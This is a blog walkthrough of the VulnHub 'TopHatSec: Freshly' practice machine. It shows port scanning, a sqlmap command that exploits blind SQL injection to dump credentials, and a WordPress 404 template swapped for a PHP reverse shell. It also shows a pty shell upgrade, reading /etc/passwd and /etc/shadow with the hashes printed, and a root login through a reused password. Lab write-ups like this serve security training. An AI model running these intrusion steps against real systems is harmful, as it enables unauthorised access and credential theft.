Tue. Oct 20th, 2020

Pentesting Fun Stuff

following the cyber security path…

TopHatSec: Freshly

Location

https://www.vulnhub.com/entry/tophatsec-freshly,118/

Description

The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. 🙂
There are a couple of different ways that you can go with this one. Good luck!

Enumeration

Because I need an entry point, I’m going to start with a nmap scan to discover some open ports.

nmap -A -T4 -sV -p- 192.168.110.5

So port 80, 443, and 8080 are open. I’ll start with port 80.
“These are not the droids you’re looking for”. Always love that sentence! Let’s check if it’s a reference to /robots.txt? Nothing.

nikto -h http://192.168.110.2/

web1
phpmyadmin.JPG

SQL Injection

Two login pages. When I try /login.php first there is nothing of interest in the source code. Also the HTTP header shows nothing of interest. I try to inject some single quotes to get an error but nothing. I’m going to try login number 2, but in the meantime I’m going to give sqlmap a try with login number 1.

sqlmap -u “http://192.168.110.2/login.php/” –data=”user=&password=&s=Submit” –random-agent –not-string=”0″ –level=5 –risk=3

Login number 2 is a phpMyadmin page. When I try to login, I get a response.
phpmyadmin-error
A MySQL server. Lets try some single quotes here. I try different combinations, but I don’t get a wanted response. In the meantime I check on the running sqlmap and see that the first login page is vulnerable to time-based blind SQLi.
tables
sqlmap-table1
sqlmap-table2
So I get the credentials of two users. Let’s log in with the first user. When I login with the known credentials there is a response on the page in the form of a ‘1’. When using bogus credentials the response on the page is ‘0’. Because there is nothing to retrieve from this page I let sqlmap retrieve the credentials from the tables phpmyadmin and wordpress8080.
wordpress8080.JPG
When I visit the website on port 8080 there is a comment:

Again, no robots.txt and except a page named /img/ (with a collection of pictures inside), there was nothing to find with nikto. When I proceed I arrive at a wordpress site.
logo
There is a comment on the page with a small reference to Star Wars again.

I don’t think I missed something, seeing I probably got the credentials for logging in the wordpress account. Time to use the credentials.

WordPress

admin.JPG

Getting a reverse shell

To get a reverse shell, I’m altering the 404 page and replace the php code with the php reverse shell code from pentestmonkey.
shell
reverse_shell.JPG
And I’m in. Time to search around the system.

python -c ‘import pty;pty.spawn(“/bin/bash”)’
daemon@Freshly:/$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION=”Ubuntu 14.04.1 LTS”
NAME=”Ubuntu”
VERSION=”14.04.1 LTS, Trusty Tahr”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 14.04.1 LTS”
VERSION_ID=”14.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”
daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux

Ubuntu 14.04 with kernel 3.13. I know that there is a privilege escalation possible when using overlayfs mounts inside of user namespaces. To get the script to work I need to compile it. So I need gcc. Let’s see if it available.

daemon@Freshly:/tmp$ compgen -c | grep -i “gcc”
compgen -c | grep -i “gcc”
daemon@Freshly:/tmp$

Noting. Bummer.
Time to move along and search some more.

daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = “NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!”

Ok. This was a bit unexpected. Guess this wraps this challenge up. Only thing is that I don’t have root access and I haven’t pwned this machine. Stopping now will leave me with an unsatisfying feeling.

daemon@Freshly:/home$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = “NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!”

After a really long time. I tried to use different passwords that were stored in the database on the root account and guess what? Passwords are reused in this challenge 🙂

daemon@Freshly:/$ su root
su root
Password: SuperSecretPassword
root@Freshly:/# id
id
uid=0(root) gid=0(root) groups=0(root)

Now I can close this challenge with a satisfied feeling.
Good work on making this challenge.